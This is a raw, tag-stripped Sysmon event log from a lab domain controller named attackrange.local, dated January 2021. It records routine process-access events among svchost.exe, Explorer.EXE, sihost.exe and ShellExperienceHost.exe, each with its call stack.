13:30:08.232{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010976Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:08.232{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010975Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:08.185{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010974Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:08.185{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010973Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:08.185{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000010972Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:07.998{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\File Explorer (7).lnk2021-01-14 13:30:07.998 10341000x800000000000000011063Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.904{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011062Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.904{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011061Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.904{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011060Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.904{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011059Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.904{08A6967A-4298-6000-2F00-000000009A01}22521160C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bc62|c:\windows\system32\tileobjserver.dll+26f22|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5fc83|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000011058Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.904{08A6967A-4298-6000-2F00-000000009A01}22521160C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|c:\windows\system32\tileobjserver.dll+bc0f|c:\windows\system32\tileobjserver.dll+26f22|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5fc83|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000011057Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.888{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011056Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.888{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011055Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.857{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011054Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.857{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011053Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.857{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011052Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.857{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011051Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.826{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011050Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.826{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d966|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2a62a|C:\Windows\System32\TwinUI.dll+dd966|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011049Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.826{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d8be|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2a62a|C:\Windows\System32\TwinUI.dll+dd966|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011048Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.826{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d966|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2a62a|C:\Windows\System32\TwinUI.dll+dd966|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011047Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.826{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d8be|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2a62a|C:\Windows\System32\TwinUI.dll+dd966|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011046Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.826{08A6967A-4753-6000-0E05-000000009A01}23361952C:\Windows\system32\sihost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+6375|C:\Windows\System32\twinui.appcore.dll+470d|C:\Windows\System32\twinui.appcore.dll+3e1e|C:\Windows\system32\activationmanager.dll+79e9|C:\Windows\system32\activationmanager.dll+ac47|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011045Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 